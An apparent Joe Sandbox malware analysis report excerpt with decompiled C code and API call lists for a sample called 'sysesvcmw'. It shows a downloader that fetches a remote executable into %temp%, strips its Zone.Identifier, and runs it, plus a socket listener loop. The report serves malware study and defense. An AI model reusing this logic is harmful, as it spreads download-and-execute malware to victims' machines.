                                                                                                                                                                                                                                                                                    					_t24 = 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				if(_t24 == 0) {
                                                                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                                                                    					return _t24;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_v26 = 0;
                                                                                                                                                                                                                                                                                    					_v22 = 0;
                                                                                                                                                                                                                                                                                    					_v18 = 0;
                                                                                                                                                                                                                                                                                    					_v14 = 0;
                                                                                                                                                                                                                                                                                    					_v28 = 2;
                                                                                                                                                                                                                                                                                    					__imp__#2( *(_t24 + 8),  &_v28, 0x10);
                                                                                                                                                                                                                                                                                    					if(2 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t24 + 0xc)) = _v20;
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t24 + 0x14)) = CreateThread(0, 0, E0040DAD0, _t24, 0, 0);
                                                                                                                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						E0040DD00(_t24, _t27);
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x0040dd70
                                                                                                                                                                                                                                                                                    0x0040dd82
                                                                                                                                                                                                                                                                                    0x0040dd88
                                                                                                                                                                                                                                                                                    0x0040dd8e
                                                                                                                                                                                                                                                                                    0x0040dd95
                                                                                                                                                                                                                                                                                    0x0040dda1
                                                                                                                                                                                                                                                                                    0x0040dda4
                                                                                                                                                                                                                                                                                    0x0040ddaa
                                                                                                                                                                                                                                                                                    0x0040ddb0
                                                                                                                                                                                                                                                                                    0x0040ddb2
                                                                                                                                                                                                                                                                                    0x0040ddb7
                                                                                                                                                                                                                                                                                    0x0040ddb7
                                                                                                                                                                                                                                                                                    0x0040ddbb
                                                                                                                                                                                                                                                                                    0x0040de1a
                                                                                                                                                                                                                                                                                    0x0040de20
                                                                                                                                                                                                                                                                                    0x0040ddbd
                                                                                                                                                                                                                                                                                    0x0040ddbf
                                                                                                                                                                                                                                                                                    0x0040ddc3
                                                                                                                                                                                                                                                                                    0x0040ddc7
                                                                                                                                                                                                                                                                                    0x0040ddcb
                                                                                                                                                                                                                                                                                    0x0040dddb
                                                                                                                                                                                                                                                                                    0x0040dde5
                                                                                                                                                                                                                                                                                    0x0040ddee
                                                                                                                                                                                                                                                                                    0x0040de0e
                                                                                                                                                                                                                                                                                    0x0040de17
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040ddf0
                                                                                                                                                                                                                                                                                    0x0040ddf0
                                                                                                                                                                                                                                                                                    0x0040ddfb
                                                                                                                                                                                                                                                                                    0x0040ddfb
                                                                                                                                                                                                                                                                                    0x0040ddee

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040BF1E,00000000), ref: 0040DD95
                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040DDA4
                                                                                                                                                                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 0040DDE5
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: SetEvent.KERNEL32(?,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD11
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: WaitForSingleObject.KERNEL32(?,000000FF,?,0040DDF5,?,?,0040BF1E,00000000), ref: 0040DD1D
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040DD00: CloseHandle.KERNEL32(?), ref: 0040DD27
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,0040DAD0,00000000,00000000,00000000), ref: 0040DE11
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3943618503-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a272f706d971db141aade7e541e5b093828ed65ab25b051faa62c99c8275b329
                                                                                                                                                                                                                                                                                    • Instruction ID: a1f51b83e62fd1e5ac6bfc854ac0cad300f812e19a803ea918e078540f5b95b0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a272f706d971db141aade7e541e5b093828ed65ab25b051faa62c99c8275b329
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9611C870A40300AFE7009FB49C86B577AA0EF44710F50897AFA08DE2D1D2F4D8488756
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                                                                    			E0040D4F0(char* _a4, char _a8) {
                                                                                                                                                                                                                                                                                    				short _v524;
                                                                                                                                                                                                                                                                                    				short _v1044;
                                                                                                                                                                                                                                                                                    				signed char _v1045;
                                                                                                                                                                                                                                                                                    				short _v1572;
                                                                                                                                                                                                                                                                                    				void* _v1576;
                                                                                                                                                                                                                                                                                    				void* _v1580;
                                                                                                                                                                                                                                                                                    				short _v2100;
                                                                                                                                                                                                                                                                                    				void _v2364;
                                                                                                                                                                                                                                                                                    				long _v2368;
                                                                                                                                                                                                                                                                                    				long _v2372;
                                                                                                                                                                                                                                                                                    				void* _v2376;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v2380;
                                                                                                                                                                                                                                                                                    				intOrPtr _v2384;
                                                                                                                                                                                                                                                                                    				char _v2385;
                                                                                                                                                                                                                                                                                    				intOrPtr _v2392;
                                                                                                                                                                                                                                                                                    				signed int _t88;
                                                                                                                                                                                                                                                                                    				signed int _t90;
                                                                                                                                                                                                                                                                                    				int _t96;
                                                                                                                                                                                                                                                                                    				signed int _t97;
                                                                                                                                                                                                                                                                                    				signed int _t99;
                                                                                                                                                                                                                                                                                    				signed int _t101;
                                                                                                                                                                                                                                                                                    				signed int _t111;
                                                                                                                                                                                                                                                                                    				signed char _t125;
                                                                                                                                                                                                                                                                                    				signed char _t127;
                                                                                                                                                                                                                                                                                    				void* _t181;
                                                                                                                                                                                                                                                                                    				void* _t182;
                                                                                                                                                                                                                                                                                    				void* _t184;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				srand(GetTickCount());
                                                                                                                                                                                                                                                                                    				_t182 = _t181 + 4;
                                                                                                                                                                                                                                                                                    				_v1045 = 0;
                                                                                                                                                                                                                                                                                    				ExpandEnvironmentStringsW(L"%temp%",  &_v2100, 0x104);
                                                                                                                                                                                                                                                                                    				_v2380 = _a4;
                                                                                                                                                                                                                                                                                    				_v2384 = _v2380 + 1;
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					_v2385 =  *_v2380;
                                                                                                                                                                                                                                                                                    					_v2380 = _v2380 + 1;
                                                                                                                                                                                                                                                                                    				} while (_v2385 != 0);
                                                                                                                                                                                                                                                                                    				_v2392 = _v2380 - _v2384;
                                                                                                                                                                                                                                                                                    				mbstowcs( &_v1044, _a4, _v2392 + 1);
                                                                                                                                                                                                                                                                                    				_t88 = rand();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				_t90 = rand();
                                                                                                                                                                                                                                                                                    				asm("cdq");
                                                                                                                                                                                                                                                                                    				wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t90 % 0x7fff + 0x3e8, _t88 % 0x7fff + 0x3e8);
                                                                                                                                                                                                                                                                                    				_t184 = _t182 + 0x20;
                                                                                                                                                                                                                                                                                    				_v2376 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36", 0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    				if(_v2376 != 0) {
                                                                                                                                                                                                                                                                                    					_v1576 = InternetOpenUrlW(_v2376,  &_v1044, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_v1576 != 0) {
                                                                                                                                                                                                                                                                                    						_v1580 = CreateFileW( &_v1572, 0x40000000, 0, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                                    						if(_v1580 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    							while(InternetReadFile(_v1576,  &_v2364, 0x103,  &_v2372) != 0 && _v2372 != 0) {
                                                                                                                                                                                                                                                                                    								WriteFile(_v1580,  &_v2364, _v2372,  &_v2368, 0);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							CloseHandle(_v1580);
                                                                                                                                                                                                                                                                                    							wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                                                                                                                                                                                                                    							DeleteFileW( &_v524);
                                                                                                                                                                                                                                                                                    							Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    							_t125 = E0040D1D0( &_v1572);
                                                                                                                                                                                                                                                                                    							_t184 = _t184 + 0x10;
                                                                                                                                                                                                                                                                                    							if((_t125 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    								DeleteFileW( &_v1572);
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								Sleep(0x7d0);
                                                                                                                                                                                                                                                                                    								_t127 = E0040D390( &_v1572);
                                                                                                                                                                                                                                                                                    								_t184 = _t184 + 4;
                                                                                                                                                                                                                                                                                    								if((_t127 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                    									_t51 =  &_a8; // 0x405de1
                                                                                                                                                                                                                                                                                    									if(( *_t51 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                                    										ExitProcess(0);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_v1045 = 1;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						CloseHandle(_v1580);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_v1576);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				InternetCloseHandle(_v2376);
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    				_t96 = _v1045 & 0x000000ff;
                                                                                                                                                                                                                                                                                    				if(_t96 == 0) {
                                                                                                                                                                                                                                                                                    					_t97 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					Sleep(0x1388 + _t97 % 0xea60 * 5);
                                                                                                                                                                                                                                                                                    					_t99 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t101 = rand();
                                                                                                                                                                                                                                                                                    					asm("cdq");
                                                                                                                                                                                                                                                                                    					_t96 = wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t101 % 0x7fff + 0x3e8, _t99 % 0x7fff + 0x3e8);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					_push( &_v1572);
                                                                                                                                                                                                                                                                                    					_push( &_v1044);
                                                                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                                                                    					L0040ECB2();
                                                                                                                                                                                                                                                                                    					if(_t96 == 0) {
                                                                                                                                                                                                                                                                                    						wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                                                                                                                                                                                                                    						DeleteFileW( &_v524);
                                                                                                                                                                                                                                                                                    						Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    						if((E0040D1D0( &_v1572) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                    							return DeleteFileW( &_v1572);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						Sleep(0x7d0);
                                                                                                                                                                                                                                                                                    						_t111 = E0040D390( &_v1572) & 0x000000ff;
                                                                                                                                                                                                                                                                                    						if(_t111 == 0) {
                                                                                                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                                                                                                    							return _t111;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t79 =  &_a8; // 0x405de1
                                                                                                                                                                                                                                                                                    						if(( *_t79 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						ExitProcess(0);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t96;
                                                                                                                                                                                                                                                                                    			}






























                                                                                                                                                                                                                                                                                    0x0040d500
                                                                                                                                                                                                                                                                                    0x0040d505
                                                                                                                                                                                                                                                                                    0x0040d508
                                                                                                                                                                                                                                                                                    0x0040d520
                                                                                                                                                                                                                                                                                    0x0040d529
                                                                                                                                                                                                                                                                                    0x0040d538
                                                                                                                                                                                                                                                                                    0x0040d53e
                                                                                                                                                                                                                                                                                    0x0040d546
                                                                                                                                                                                                                                                                                    0x0040d54c
                                                                                                                                                                                                                                                                                    0x0040d553
                                                                                                                                                                                                                                                                                    0x0040d568
                                                                                                                                                                                                                                                                                    0x0040d583
                                                                                                                                                                                                                                                                                    0x0040d58b
                                                                                                                                                                                                                                                                                    0x0040d590
                                                                                                                                                                                                                                                                                    0x0040d59f
                                                                                                                                                                                                                                                                                    0x0040d5a4
                                                                                                                                                                                                                                                                                    0x0040d5c6
                                                                                                                                                                                                                                                                                    0x0040d5cc
                                                                                                                                                                                                                                                                                    0x0040d5e2
                                                                                                                                                                                                                                                                                    0x0040d5ef
                                                                                                                                                                                                                                                                                    0x0040d611
                                                                                                                                                                                                                                                                                    0x0040d61e
                                                                                                                                                                                                                                                                                    0x0040d640
                                                                                                                                                                                                                                                                                    0x0040d64d
                                                                                                                                                                                                                                                                                    0x0040d653
                                                                                                                                                                                                                                                                                    0x0040d69e
                                                                                                                                                                                                                                                                                    0x0040d69e
                                                                                                                                                                                                                                                                                    0x0040d6ad
                                                                                                                                                                                                                                                                                    0x0040d6c6
                                                                                                                                                                                                                                                                                    0x0040d6d6
                                                                                                                                                                                                                                                                                    0x0040d6e1
                                                                                                                                                                                                                                                                                    0x0040d6ee
                                                                                                                                                                                                                                                                                    0x0040d6f3
                                                                                                                                                                                                                                                                                    0x0040d6fb
                                                                                                                                                                                                                                                                                    0x0040d740
                                                                                                                                                                                                                                                                                    0x0040d6fd
                                                                                                                                                                                                                                                                                    0x0040d702
                                                                                                                                                                                                                                                                                    0x0040d70f
                                                                                                                                                                                                                                                                                    0x0040d714
                                                                                                                                                                                                                                                                                    0x0040d71d
                                                                                                                                                                                                                                                                                    0x0040d71f
                                                                                                                                                                                                                                                                                    0x0040d726
                                                                                                                                                                                                                                                                                    0x0040d72a
                                                                                                                                                                                                                                                                                    0x0040d72a
                                                                                                                                                                                                                                                                                    0x0040d730
                                                                                                                                                                                                                                                                                    0x0040d730
                                                                                                                                                                                                                                                                                    0x0040d737
                                                                                                                                                                                                                                                                                    0x0040d6fb
                                                                                                                                                                                                                                                                                    0x0040d74d
                                                                                                                                                                                                                                                                                    0x0040d74d
                                                                                                                                                                                                                                                                                    0x0040d75a
                                                                                                                                                                                                                                                                                    0x0040d75a
                                                                                                                                                                                                                                                                                    0x0040d767
                                                                                                                                                                                                                                                                                    0x0040d772
                                                                                                                                                                                                                                                                                    0x0040d778
                                                                                                                                                                                                                                                                                    0x0040d781
                                                                                                                                                                                                                                                                                    0x0040d787
                                                                                                                                                                                                                                                                                    0x0040d78c
                                                                                                                                                                                                                                                                                    0x0040d79e
                                                                                                                                                                                                                                                                                    0x0040d7a4
                                                                                                                                                                                                                                                                                    0x0040d7a9
                                                                                                                                                                                                                                                                                    0x0040d7b8
                                                                                                                                                                                                                                                                                    0x0040d7bd
                                                                                                                                                                                                                                                                                    0x0040d7df
                                                                                                                                                                                                                                                                                    0x0040d7e8
                                                                                                                                                                                                                                                                                    0x0040d7ea
                                                                                                                                                                                                                                                                                    0x0040d7f2
                                                                                                                                                                                                                                                                                    0x0040d7f9
                                                                                                                                                                                                                                                                                    0x0040d7fa
                                                                                                                                                                                                                                                                                    0x0040d7fc
                                                                                                                                                                                                                                                                                    0x0040d803
                                                                                                                                                                                                                                                                                    0x0040d81c
                                                                                                                                                                                                                                                                                    0x0040d82c
                                                                                                                                                                                                                                                                                    0x0040d837
                                                                                                                                                                                                                                                                                    0x0040d851
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d88e
                                                                                                                                                                                                                                                                                    0x0040d858
                                                                                                                                                                                                                                                                                    0x0040d86d
                                                                                                                                                                                                                                                                                    0x0040d872
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d874
                                                                                                                                                                                                                                                                                    0x0040d87b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d87f
                                                                                                                                                                                                                                                                                    0x0040d87f
                                                                                                                                                                                                                                                                                    0x0040d803
                                                                                                                                                                                                                                                                                    0x0040d897

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040D4F9
                                                                                                                                                                                                                                                                                    • srand.MSVCRT ref: 0040D500
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040D520
                                                                                                                                                                                                                                                                                    • mbstowcs.NTDLL ref: 0040D583
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040D58B
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040D59F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040D5C6
                                                                                                                                                                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040D5DC
                                                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D60B
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D63A
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040D66D
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040D69E
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040D6AD
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040D6C6
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040D6D6
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040D72A
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040D702
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D390: memset.NTDLL ref: 0040D39E
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D390: CreateProcessW.KERNEL32(00000000,'b@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040D3E5
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D390: Sleep.KERNEL32(000003E8), ref: 0040D3F5
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040D740
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040D74D
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040D75A
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040D767
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D772
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040D787
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 0040D79E
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040D7A4
                                                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040D7B8
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040D7DF
                                                                                                                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040D7FC
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040D81C
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040D82C
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D837
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D6E1
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D1D0: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D204
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D1D0: CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D225
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D1D0: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040D244
                                                                                                                                                                                                                                                                                      • Part of subcall function 0040D1D0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D25D
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040D858
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040D87F
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040D88E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000006.00000002.409103266.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409098401.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409115174.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000006.00000002.409120956.0000000000414000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$Sleep$Internetrand$CloseCreateDeleteHandlewsprintf$Process$ExitOpen$CountDownloadEnvironmentExpandMappingReadSizeStringsTickViewWritembstowcsmemsetsrand
                                                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36$]@
                                                                                                                                                                                                                                                                                    • API String ID: 3135114409-3650745090
                                                                                                                                                                                                                                                                                    • Opcode ID: 2c9c25e0dc9ca5472f606a88119dc9f650267a02f53d8b332173f59271a64fa7
                                                                                                                                                                                                                                                                                    • Instruction ID: 4a692bf560fa698191a4ba968421e092d812baa048ff7158642ad85748ebf153
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c9c25e0dc9ca5472f606a88119dc9f650267a02f53d8b332173f59271a64fa7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C291C6B5D00318ABEB24DB50DC45FED7779AB88301F0484F9F609A61C1DAB99AC4CF28
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 415 40e400-40e427 GetTickCount WaitForSingleObject 416 40e5a9-40e5af 415->416 417 40e42d-40e444 WSAWaitForMultipleEvents 415->417 418 40e4d0-40e4e3 GetTickCount 417->418 419 40e44a-40e461 WSAEnumNetworkEvents 417->419 421 40e523-40e52c GetTickCount 418->421 422 40e4e5-40e4f4 EnterCriticalSection 418->422 419->418 420 40e463-40e468 419->420 420->418 423 40e46a-40e470 420->423 424 40e595-40e5a3 WaitForSingleObject 421->424 425 40e52e-40e53d EnterCriticalSection 421->425 426 40e4f6-40e4fd 422->426 427 40e51a-40e521 LeaveCriticalSection 422->427 423->418 430 40e472-40e491 accept 423->430 424->416 424->417 431 40e581-40e591 LeaveCriticalSection GetTickCount 425->431 432 40e53f-40e557 InterlockedExchangeAdd call 40be60 425->432 428 40e515 call 40e300 426->428 429 40e4ff-40e507 426->429 427->424 428->427 429->426 433 40e509-40e510 LeaveCriticalSection 429->433 430->418 435 40e493-40e4a2 call 40df90 430->435 431->424 440 40e577-40e57f 432->440 441 40e559-40e562 432->441 433->424 435->418 442 40e4a4-40e4bf call 40e220 435->442 440->431 440->432 441->440 443 40e564-40e56d call 409600 441->443 442->418 448 40e4c1-40e4c7 442->448 443->440 448->418 449 40e4c9-40e4cb call 40e7d0 448->449 449->418
                                                                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                                                                    			E0040E400(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                                                                                                                    				long _v72;
                                                                                                                                                                                                                                                                                    				signed char _v80;
                                                                                                                                                                                                                                                                                    				long _v92;
                                                                                                                                                                                                                                                                                    				char _v96;
                                                                                                                                                                                                                                                                                    				char _v100;
                                                                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                                                                                                    				long _t33;
                                                                                                                                                                                                                                                                                    				long _t34;
                                                                                                                                                                                                                                                                                    				long _t42;
                                                                                                                                                                                                                                                                                    				intOrPtr _t49;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t56;
                                                                                                                                                                                                                                                                                    				intOrPtr _t70;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                                                                                                    				long _t74;
                                                                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                                                                    				struct _CRITICAL_SECTION* _t76;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t77;
                                                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                                                    				signed int _t79;
                                                                                                                                                                                                                                                                                    				void* _t81;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t81 = (_t79 & 0xfffffff8) - 0x44;
                                                                                                                                                                                                                                                                                    				_t31 = GetTickCount();
                                                                                                                                                                                                                                                                                    				_t56 = _a4;
                                                                                                                                                                                                                                                                                    				_v72 = _t31;
                                                                                                                                                                                                                                                                                    				_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                                                                                                                                                                                                                    				if(_t33 == 0) {
                                                                                                                                                                                                                                                                                    					L25:
                                                                                                                                                                                                                                                                                    					return _t33;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                                                    					_t73 = _t56 + 0x18;
                                                                                                                                                                                                                                                                                    					__imp__WSAWaitForMultipleEvents(1, _t73, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					if(_t33 != 0x102) {
                                                                                                                                                                                                                                                                                    						__imp__WSAEnumNetworkEvents( *((intOrPtr*)(_t56 + 0x14)),  *_t73,  &_v68);
                                                                                                                                                                                                                                                                                    						if((_v80 & 0x00000008) != 0 && _v64 == 0 &&  *_t56 == 0x494f4350) {
                                                                                                                                                                                                                                                                                    							_t49 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                                                                                                                                                                                                                    							_v100 = 0x10;
                                                                                                                                                                                                                                                                                    							__imp__#1(_t49,  &_v96,  &_v100);
                                                                                                                                                                                                                                                                                    							if(_t49 != 0xffffffff) {
